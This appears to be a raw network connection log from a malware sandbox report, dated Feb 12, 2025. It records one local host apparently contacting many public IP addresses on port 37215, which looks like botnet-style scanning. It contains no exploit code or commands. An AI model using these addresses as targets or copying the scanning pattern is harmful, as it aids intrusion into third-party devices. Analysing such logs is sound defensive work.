                                                Feb 12, 2025 16:56:59.771301031 CET2458237215192.168.2.2341.107.201.183
                                                Feb 12, 2025 16:56:59.771301031 CET2458237215192.168.2.2341.170.188.1
                                                Feb 12, 2025 16:56:59.771326065 CET2458237215192.168.2.23197.108.194.54
                                                Feb 12, 2025 16:56:59.771338940 CET2458237215192.168.2.23157.3.198.191
                                                Feb 12, 2025 16:56:59.771341085 CET2458237215192.168.2.23103.183.51.104
                                                Feb 12, 2025 16:56:59.771342993 CET2458237215192.168.2.2341.104.104.109
                                                Feb 12, 2025 16:56:59.771342993 CET2458237215192.168.2.23172.140.198.178
                                                Feb 12, 2025 16:56:59.771357059 CET2458237215192.168.2.23157.1.1.223
                                                Feb 12, 2025 16:56:59.771357059 CET2458237215192.168.2.23197.161.101.225
                                                Feb 12, 2025 16:56:59.771364927 CET2458237215192.168.2.23157.42.89.207
                                                Feb 12, 2025 16:56:59.771368027 CET2458237215192.168.2.23197.26.44.66
                                                Feb 12, 2025 16:56:59.771377087 CET2458237215192.168.2.23197.168.14.31
                                                Feb 12, 2025 16:56:59.771384954 CET2458237215192.168.2.2341.149.199.211
                                                Feb 12, 2025 16:56:59.771392107 CET2458237215192.168.2.23157.223.42.252
                                                Feb 12, 2025 16:56:59.771392107 CET2458237215192.168.2.2341.61.41.84
                                                Feb 12, 2025 16:56:59.771403074 CET2458237215192.168.2.2341.82.154.93
                                                Feb 12, 2025 16:56:59.771410942 CET2458237215192.168.2.2341.95.238.246
                                                Feb 12, 2025 16:56:59.771420002 CET2458237215192.168.2.2341.153.254.233
                                                Feb 12, 2025 16:56:59.771424055 CET2458237215192.168.2.2341.21.95.228
                                                Feb 12, 2025 16:56:59.771433115 CET2458237215192.168.2.23157.225.88.222
                                                Feb 12, 2025 16:56:59.771449089 CET2458237215192.168.2.23160.186.43.48
                                                Feb 12, 2025 16:56:59.771456003 CET2458237215192.168.2.23157.146.221.144
                                                Feb 12, 2025 16:56:59.771457911 CET2458237215192.168.2.2341.101.195.209
                                                Feb 12, 2025 16:56:59.771465063 CET2458237215192.168.2.23157.222.216.143
                                                Feb 12, 2025 16:56:59.771467924 CET2458237215192.168.2.23106.25.229.198
                                                Feb 12, 2025 16:56:59.771487951 CET2458237215192.168.2.23157.233.54.206
                                                Feb 12, 2025 16:56:59.771501064 CET2458237215192.168.2.2341.114.235.84
                                                Feb 12, 2025 16:56:59.771501064 CET2458237215192.168.2.23160.164.137.61
                                                Feb 12, 2025 16:56:59.771506071 CET2458237215192.168.2.2341.218.164.99
                                                Feb 12, 2025 16:56:59.771528959 CET2458237215192.168.2.2341.71.41.156
                                                Feb 12, 2025 16:56:59.771533012 CET2458237215192.168.2.2341.66.72.210
                                                Feb 12, 2025 16:56:59.771538973 CET2458237215192.168.2.2361.70.230.84
                                                Feb 12, 2025 16:56:59.771543026 CET2458237215192.168.2.23197.23.21.200
                                                Feb 12, 2025 16:56:59.771553993 CET2458237215192.168.2.2365.175.178.74
                                                Feb 12, 2025 16:56:59.771555901 CET2458237215192.168.2.23157.184.16.202
                                                Feb 12, 2025 16:56:59.771563053 CET2458237215192.168.2.23197.63.99.107
                                                Feb 12, 2025 16:56:59.771579981 CET2458237215192.168.2.23197.254.219.29
                                                Feb 12, 2025 16:56:59.771579981 CET2458237215192.168.2.23197.84.4.20
                                                Feb 12, 2025 16:56:59.771588087 CET2458237215192.168.2.2341.247.114.89
                                                Feb 12, 2025 16:56:59.771591902 CET2458237215192.168.2.23197.110.174.157
                                                Feb 12, 2025 16:56:59.771601915 CET2458237215192.168.2.2341.25.47.190
                                                Feb 12, 2025 16:56:59.771606922 CET2458237215192.168.2.23152.33.85.112
                                                Feb 12, 2025 16:56:59.771620989 CET2458237215192.168.2.23155.91.170.221
                                                Feb 12, 2025 16:56:59.771624088 CET2458237215192.168.2.2341.8.39.145
                                                Feb 12, 2025 16:56:59.771636963 CET2458237215192.168.2.23157.168.160.68
                                                Feb 12, 2025 16:56:59.771642923 CET2458237215192.168.2.23157.170.3.99
                                                Feb 12, 2025 16:56:59.771648884 CET2458237215192.168.2.23197.59.95.140
                                                Feb 12, 2025 16:56:59.771661043 CET2458237215192.168.2.23197.110.119.9
                                                Feb 12, 2025 16:56:59.771666050 CET2458237215192.168.2.23197.5.174.72
                                                Feb 12, 2025 16:56:59.771672010 CET2458237215192.168.2.23157.23.246.226
                                                Feb 12, 2025 16:56:59.771673918 CET2458237215192.168.2.23157.196.77.241
                                                Feb 12, 2025 16:56:59.771697998 CET2458237215192.168.2.23197.202.191.158
                                                Feb 12, 2025 16:56:59.771697998 CET2458237215192.168.2.2334.36.176.138
                                                Feb 12, 2025 16:56:59.771708012 CET2458237215192.168.2.2398.29.99.63
                                                Feb 12, 2025 16:56:59.771708012 CET2458237215192.168.2.2341.67.182.241
                                                Feb 12, 2025 16:56:59.771708012 CET2458237215192.168.2.2341.227.73.170
                                                Feb 12, 2025 16:56:59.771717072 CET2458237215192.168.2.23157.243.241.161
                                                Feb 12, 2025 16:56:59.771723032 CET2458237215192.168.2.23197.196.233.120
                                                Feb 12, 2025 16:56:59.771732092 CET2458237215192.168.2.23197.18.141.33
                                                Feb 12, 2025 16:56:59.771737099 CET2458237215192.168.2.23157.190.174.111
                                                Feb 12, 2025 16:56:59.771749973 CET2458237215192.168.2.23157.155.202.252
                                                Feb 12, 2025 16:56:59.771754980 CET2458237215192.168.2.23171.57.144.246
                                                Feb 12, 2025 16:56:59.771758080 CET2458237215192.168.2.2341.69.168.90
                                                Feb 12, 2025 16:56:59.771769047 CET2458237215192.168.2.23100.140.119.58
                                                Feb 12, 2025 16:56:59.771769047 CET2458237215192.168.2.2341.113.89.177
                                                Feb 12, 2025 16:56:59.771779060 CET2458237215192.168.2.2391.245.39.59
                                                Feb 12, 2025 16:56:59.771792889 CET2458237215192.168.2.23195.22.58.8
                                                Feb 12, 2025 16:56:59.771800041 CET2458237215192.168.2.23157.130.207.128
                                                Feb 12, 2025 16:56:59.771802902 CET2458237215192.168.2.2341.142.163.19
                                                Feb 12, 2025 16:56:59.771806955 CET2458237215192.168.2.23157.93.17.249
                                                Feb 12, 2025 16:56:59.771815062 CET2458237215192.168.2.23197.162.211.19
                                                Feb 12, 2025 16:56:59.771821976 CET2458237215192.168.2.23130.115.218.181
                                                Feb 12, 2025 16:56:59.771826029 CET2458237215192.168.2.23197.73.58.38
                                                Feb 12, 2025 16:56:59.771828890 CET2458237215192.168.2.23197.251.103.157
                                                Feb 12, 2025 16:56:59.771831036 CET2458237215192.168.2.2341.103.82.110
                                                Feb 12, 2025 16:56:59.771841049 CET2458237215192.168.2.2341.244.119.196
                                                Feb 12, 2025 16:56:59.771846056 CET2458237215192.168.2.23197.151.61.68
                                                Feb 12, 2025 16:56:59.771852970 CET2458237215192.168.2.23157.164.210.111
                                                Feb 12, 2025 16:56:59.771863937 CET2458237215192.168.2.23157.170.161.191
                                                Feb 12, 2025 16:56:59.771864891 CET2458237215192.168.2.2325.194.119.223
                                                Feb 12, 2025 16:56:59.771873951 CET2458237215192.168.2.2341.180.33.51
                                                Feb 12, 2025 16:56:59.771876097 CET2458237215192.168.2.23157.71.204.205
                                                Feb 12, 2025 16:56:59.771876097 CET2458237215192.168.2.23197.164.73.168
                                                Feb 12, 2025 16:56:59.771878958 CET2458237215192.168.2.2370.8.208.118
                                                Feb 12, 2025 16:56:59.771888018 CET2458237215192.168.2.23168.121.172.220